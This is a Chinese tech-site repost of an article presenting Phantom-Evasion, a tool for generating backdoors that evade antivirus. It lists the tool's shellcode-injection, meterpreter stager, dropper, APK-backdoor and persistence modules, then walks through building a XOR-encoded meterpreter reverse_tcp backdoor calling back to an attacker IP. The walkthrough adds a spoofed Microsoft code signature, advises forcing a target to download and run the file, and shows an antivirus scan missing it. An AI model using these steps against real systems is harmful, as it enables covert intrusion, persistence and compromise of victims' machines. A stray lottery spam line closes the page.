<button id="ei02c"><ol id="ei02c"></ol></button>
            1. <div id="ei02c"></div>

                    1. 安基網 首頁 安全 取證分析 查看內容

                      Phantom-Evasion:可以生成繞過大多數反病毒軟件的后門程序

                      2019-3-12 16:43| 投稿: xiaotiger |來自: 互聯網


                      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

                      摘要: 描述Phantom-Evasion是一個用python編寫的交互式防病毒逃避工具,即使使用最常見的32位msfvenom有效負載(64位有效負載的較低檢測率),也能生成(幾乎)FUD可執行文件。該工具的目的是通過使用專注于多態代碼和防病毒沙箱檢測技術的模塊,使得防病毒逃避成為測試者的一項簡單任務。從版本1.0開始,Pha ...

                      描述

                      Phantom-Evasion是一個用python編寫的交互式防病毒逃避工具,即使使用最常見的32位msfvenom有效負載(64位有效負載的較低檢測率),也能生成(幾乎)FUD可執行文件。該工具的目的是通過使用專注于多態代碼和防病毒沙箱檢測技術的模塊,使得防病毒逃避成為測試者的一項簡單任務。從版本1.0開始,Phantom-Evasion還包括一個專門用于持久性和輔助模塊的后期開發部分。

                      安裝/使用

                      git clone https://github.com/oddcod3/Phantom-Evasion
                      cd Phantom-Evasion
                      sudo python phantom-evasion.py
                      

                      也可以進行源碼安裝

                      sudo chmod +x ./phantom-evasion.py
                      sudo ./phantom-evasion.py
                      

                      WINDOWS PAYLOADS

                      Windows Shellcode注入模塊(C)支持Msfvenom Windows有效負載和自定義shellcode(>)隨機垃圾碼和Windows防病毒逃避技術(>)提供多字節Xor編碼器(參見Multibyte Xor編碼器自述文件部分)(>)Decoy Processes Spawner可用(參見Decoy Process Spawner部分)(>)剝離可執行文件(https://en.wikipedia.org/wiki/Strip_(Unix))(>)執行時間范圍:35-60秒

                      Windows Shellcode Injection VirtualAlloc:使用VirtualAlloc,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。

                      Windows Shellcode Injection VirtualAlloc NoDirectCall LL / GPA:使用VirtualAlloc,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。使用LoadLibrary和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode Injection VirtualAlloc NoDirectCall GPA / GMH:使用VirtualAlloc,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。使用GetModuleHandle和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode Injection HeapAlloc:使用HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。

                      Windows Shellcode Injection HeapAlloc NoDirectCall LL / GPA:使用HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。使用LoadLibrary和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode Injection HeapAlloc NoDirectCall GPA / GMH:使用HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API在內存中注入和執行shellcode。使用GetModuleHandle和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode Injection Process注入:使用VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API將shellcode注入和執行到遠程進程內存(默認:OneDrive.exe(x86),explorer.exe(x64))。

                      Windows Shellcode注入流程注入NoDirectCall LL / GPA:使用VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API將shellcode注入和執行到遠程進程內存(默認:OneDrive.exe(x86),explorer.exe(x64))。使用LoadLibrary和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode注入流程注入NoDirectCall GPA / GMH:使用VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API將shellcode注入和執行到遠程進程內存(默認:OneDrive.exe(x86),explorer.exe(x64))。使用GetModuleHandle和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode注入線程劫持:將shellcode注入遠程進程內存并執行它,使用VirtualAllocEx,WriteProcessMemory,Get / SetThreadContext,Suspend / ResumeThread API執行線程執行劫持(默認:OneDrive.exe(x86),explorer.exe(x64))。

                      Windows Shellcode注入線程劫持LL / GPA:將shellcode注入遠程進程內存并執行它,使用VirtualAllocEx,WriteProcessMemory,Get / SetThreadContext,Suspend /執行線程執行劫持(默認:OneDrive.exe(x86),explorer.exe(x64)) ResumeThread API。使用LoadLibrary和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Shellcode注入線程劫持GPA / GMH:將shellcode注入遠程進程內存并執行它,使用VirtualAllocEx,WriteProcessMemory,Get / SetThreadContext,Suspend /執行線程執行劫持(默認:OneDrive.exe(x86),explorer.exe(x64)) ResumeThread API。使用GetModuleHandle和GetProcAddress API對關鍵API進行動態加載(無直接調用)。

                      Windows Pure C meterpreter stager

                      純C多態儀表預測器與msfconsole和鈷觸發信標兼容。(reverse_tcp / reversehttp)(>)隨機垃圾代碼和Windows防病毒逃避技術(>)幻影逃避誘餌程序產生可用(參見幻影逃避誘餌程序產生部分)(>)剝離可執行程序可用( https://en.wikipedia.org/wiki/Strip_(Unix) ))(>)執行時間范圍:35-60秒

                      C meterpreter / reverse_TCP VirtualAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_tcp多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_tcp(如果是x86) – windows / x64 / meterpreter / reverse_tcp(如果是x64),內存:虛擬)

                      C meterpreter / reverse_TCP HeapAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_tcp多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_tcp(如果是x86) – windows / x64 / meterpreter / reverse_tcp(如果是x64),內存:堆)

                      C meterpreter / reverse_TCP VirtualAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_tcp多態stager(rrequire multi / handler listener,有效負載設置為windows / meterpreter / reverse_tcp(如果是x86) – windows / x64 / meterpreter / reverse_tcp(如果是x64),內存:虛擬,在運行時加載的API)

                      C meterpreter / reverse_TCP HeapAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_tcp多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_tcp(如果是x86) – windows / x64 / meterpreter / reverse_tcp(如果是x64),內存:堆,運行時加載的API)

                      C meterpreter / reverse_HTTP VirtualAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_http(如果是x86) – windows / x64 / meterpreter / reverse_http(如果是x64),內存:虛擬)

                      C meterpreter / reverse_HTTP HeapAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_http(如果是x86) – windows / x64 / meterpreter / reverse_http(如果是x64),內存:堆)

                      C meterpreter / reverse_HTTP VirtualAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_http(如果是x86) – windows / x64 / meterpreter / reverse_http(如果是x64),在運行時加載的API)

                      C meterpreter / reverse_HTTP HeapAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_http(如果是x86) – windows / x64 / meterpreter / reverse_http(如果是x64),內存:堆,運行時加載的API)

                      C meterpreter / reverse_HTTPS VirtualAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_https(如果是x86) – windows / x64 / meterpreter / reverse_https(如果是x64),內存:虛擬)

                      C meterpreter / reverse_HTTPS HeapAlloc(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_https(如果是x86) – windows / x64 / meterpreter / reverse_https(如果是x64),內存:堆)

                      C meterpreter / reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_https(如果是x86) – windows / x64 / meterpreter / reverse_https(如果是x64),在運行時加載的API)

                      C meterpreter / reverse_HTTPS HeapAlloc NoDirectCall GPAGMH(x86 / x64):用c編寫的32/64位windows / meterpreter / reverse_http多態stager(需要多個/處理程序監聽器,有效負載設置為windows / meterpreter / reverse_https(如果是x86) – windows / x64 / meterpreter / reverse_https(如果是x64),內存:堆,運行時加載的API)

                      Powershell / Wine-Pyinstaller模塊

                      Powershell模塊:(>)隨機垃圾代碼和Windows防病毒規避技術(>)誘騙程序Spawner可用(參見幻影逃避誘餌程序產生部分)(>)條帶可執行程序可用(https://en.wikipedia.org/wiki/Strip_(Unix)) (>)執行時間范圍:35-60秒

                      Windows Powershell / Cmd Oneliner Dropper:需要用戶提供的Powershell / Cmd oneliner有效負載(例如Empire oneliner有效負載)。生成用c編寫的Windows powershell / Cmd oneliner dropper。Powershell / Cmd oneliner有效負載使用system()函數執行。

                      Windows Powershell Script Dropper:支持msfvenom和自定義PowerShell有效負載。(32位powershell有效負載與64位PowerShell目標不兼容,反之亦然。)生成用c編寫的Windows powershell腳本(.ps1)dropper。Powershell腳本有效負載使用system()函數執行(powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File“PathTops1script”)。

                      Wine-Pyinstaller模塊:

                      (>)隨機垃圾代碼和Windows防病毒規避技術(>)執行時間范圍:5-25秒(>)要求在wine中安裝python和pyinstaller。

                      Windows WinePyinstaller Python Meterpreter

                      純python meterpreter有效載荷。

                      WinePyinstaller Oneline有效負載滴管

                      純python powershell / cmd oneliner滴管。

                      使用os.system()執行Powershell / cmd有效負載。

                      LINUX PAYLOADS

                      Linux Shellcode注入模塊(C)支持Msfvenom linux有效負載和自定義shellcode。(>)隨機化垃圾碼和C防病毒規避技術(>)多字節Xor編碼器可用(參見Multibyte Xor編碼器自述文件部分)(>)可執行條帶可執行文件(https://en.wikipedia.org/wiki/Strip_ ( Unix))( >)執行時間范圍:20-45秒

                      Linux Shellcode Injection HeapAlloc:使用mmap和memcpy在內存中注入和執行shellcode。

                      Linux Bash Oneliner Dropper:使用system()函數執行自定義oneliner有效負載。

                      OSX PAYLOADS

                      OSX 32位多編碼:純msfvenom多編碼OSX有效負載。

                      ANDROID PAYLOADS

                      Android Msfvenom Apk smali / baksmali:(>)假循環注入(>)轉到循環

                      Android msfvenom有效負載修改了與apktool重建(也能夠apk后門注入)。

                      通用PAYLOADS

                      生成與用于運行Phantom-Evasion的操作系統兼容的可執行文件。

                      Universal Meterpreter increments-trick
                      Universal Polymorphic Meterpreter
                      Universal Polymorphic Oneliner dropper
                      

                      POST-EXPLOITATION模塊

                      1.Windows持久性RegCreateKeyExW添加注冊表項(C)此模塊生成可執行文件,需要將其上載到目標計算機并執行指定文件的完整路徑以作為參數添加到啟動。

                      2.Windows Persistence REG添加注冊表項(CMD)此模塊生成持久性cmdline有效內容(通過REG.exe添加注冊表項)。

                      3.Windows持久性保持進程活動此模塊生成可執行文件,需要將其上載到目標計算機并執行。使用CreateToolSnapshoot ProcessFirst和ProcessNext檢查指定的進程是否每隔X秒活動一次。有用的結合Persistence N.1或N.2(持久性啟動Keep進程活動文件,然后啟動并保持指定的進程)

                      4.Windows Persistence Schtasks cmdline

                      此模塊生成持久性cmdline有效負載(使用Schtasks.exe)。

                      5.Windows設置文件屬性隱藏

                      通過命令行或已編譯的可執行文件隱藏文件(SetFileAttributes API)

                      如何利用?

                      ### 進入Phantom-Evasion,如下選擇

                      [1] Windows modules-->[1] Shellcode Injection-->[4] Windows Shellcode Injection HeapAlloc(C)-->[1] Msfvenom
                      

                      我們輸入msfvenom有效載荷

                      windows/meterpreter/reverse_tcp
                      

                      輸入LHOST和LPORT

                      LHOST:192.168.34.133
                      LPORT:4444
                      

                      自定義msfvenom選項,我們不填直接回車

                      編碼方式,我們選擇[4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)

                      輸入生成程序的名,是否添加多進程選擇‘是’,輸入進程數‘1’,

                      [] choose how to supply shellcode:
                      [1] Msfvenom
                      [2] Custom shellcode
                      [0] Back
                      [>] Please insert option: 1
                      [>] Please enter msfvenom payload (example: windows/meterpreter/reverse_tcp):windows/meterpreter/reverse_tcp
                      [>] Please insert LHOST: 192.168.34.133
                      [>] Please insert LPORT: 4444
                      [>] Custom msfvenom options(default: blank): 
                      [>] Encoding step:
                      [1] x86/xor_dynamic (average)
                      [2] x86/xor_dynamic + Multibyte-key xor (good)
                      [3] x86/xor_dynamic + Double Multibyte-key xor (excellent)
                      [4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)
                      [>] Please enter options number: 4
                      [>] Enter output filename: test
                      [>] Spawn Multiple Processes:
                      During target-side execution this will cause to spawn a maximum of 4 processes
                      consequentialy.
                      Only the last spawned process will reach the malicious section of code
                      while the other decoy processes spawned before will executes only random junk code
                      [>] Add multiple processes behaviour?(y/n): y
                      [>] Insert number of decoy processes (integer between 1-3): 1
                      [>] Generating code...
                      [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
                      Found 1 compatible encoders
                      Attempting to encode payload with 1 iterations of x86/xor_dynamic
                      x86/xor_dynamic succeeded with size 387 (iteration=0)
                      x86/xor_dynamic chosen with final size 387
                      Payload size: 387 bytes
                      Final size of c file: 1650 bytes
                      [>] Triple-key Xor multibyte encoding...
                      [Building xor-key (lenght:35]: \\xa2\\x3b\\xa4\\x97\\x37\\x3b\\x30\\x43\\xba\\xe3\\x70\\x6a\\x54\\xa9\\xbe\\xa0\\x36\\x97\\xd9\\xcc\\x81\\xc2\\x77\\x3d\\x78\\x5c\\xaf\\xd2\\xa4\\x82\\x95\\x2b\\xde\\x2a\\x76
                      [>] Compiling...
                      [>] Strip 
                      strip is a GNU utility to "strip" symbols from object files.
                      This is useful for minimizing their file size, streamlining them for distribution.
                      It can also be useful for making it more difficult to reverse-engineer the compiled code.
                      (Lower rate of detection)
                      [>] Strip executable? (y/n):y
                      [>] Stripping...
                      [>] Sign Executable 
                      Online Certificate spoofer & Executabe signer (Lower rate of detection)
                      [>] Sign executable? (y/n):y
                      [>] Insert certificate spoofing target (default: www.microsoft.com:443): 
                      |DNS-request| www.microsoft.com 
                      |S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
                      |DNS-response| www.microsoft.com is 2.22.93.15
                      |S-chain|-<>-127.0.0.1:1080-<><>-2.22.93.15:443-<><>-OK
                      [>] Insert sign software description (default: Notepad Benchmark Util): 
                      [>] Signing test.exe with osslsigncode...
                      [>] Succeeded
                      [<>] File saved in Phantom-Evasion folder
                      [>] Press Enter to continue
                      

                      生成代碼之后將會輸出到Phantom-Evasion目錄下

                      將生成的后門程序,放在apache下,迫使目標下載并執行

                      我們用360進行安全查殺

                      360木馬查殺掃描日志
                      開始時間: 2018-12-22 00:13:46
                      掃描用時: 00:00:03
                      掃描類型: 自定義掃描
                      掃描引擎:360云查殺引擎(本地木馬庫) 360啟發式引擎 QEX腳本查殺引擎 
                      掃描文件數: 2
                      系統關鍵位置文件: 0
                      系統內存運行模塊: 0
                      壓縮包文件: 0
                      安全的文件數: 2
                      發現安全威脅: 0
                      已處理安全威脅: 0
                      掃描選項
                      掃描后自動關機: 否
                      掃描模式: 速度最快
                      管理員:是
                      掃描內容
                      \\vmware-host\Shared Folders\桌面\test.exe
                      白名單設置
                      帶推廣標記的網址導航圖標 
                      掃描結果
                      未發現安全威脅
                      

                      我們拿到virustotal掃一下,23333

                      后門程序生效后,成功建立會話,拿到shel權限

                      項目地址

                      https://github.com/oddcod3/Phantom-Evasion

                      *本文作者:不分手的戀愛,轉載請注明來自FreeBuf.COM



                      小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

                      本文出自:https://www.toutiao.com/i6667347566616642052/

                      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


                      鮮花

                      握手

                      雷人

                      路過

                      雞蛋

                      相關閱讀

                      最新評論

                       最新
                      返回頂部
                      新疆11选5计算公式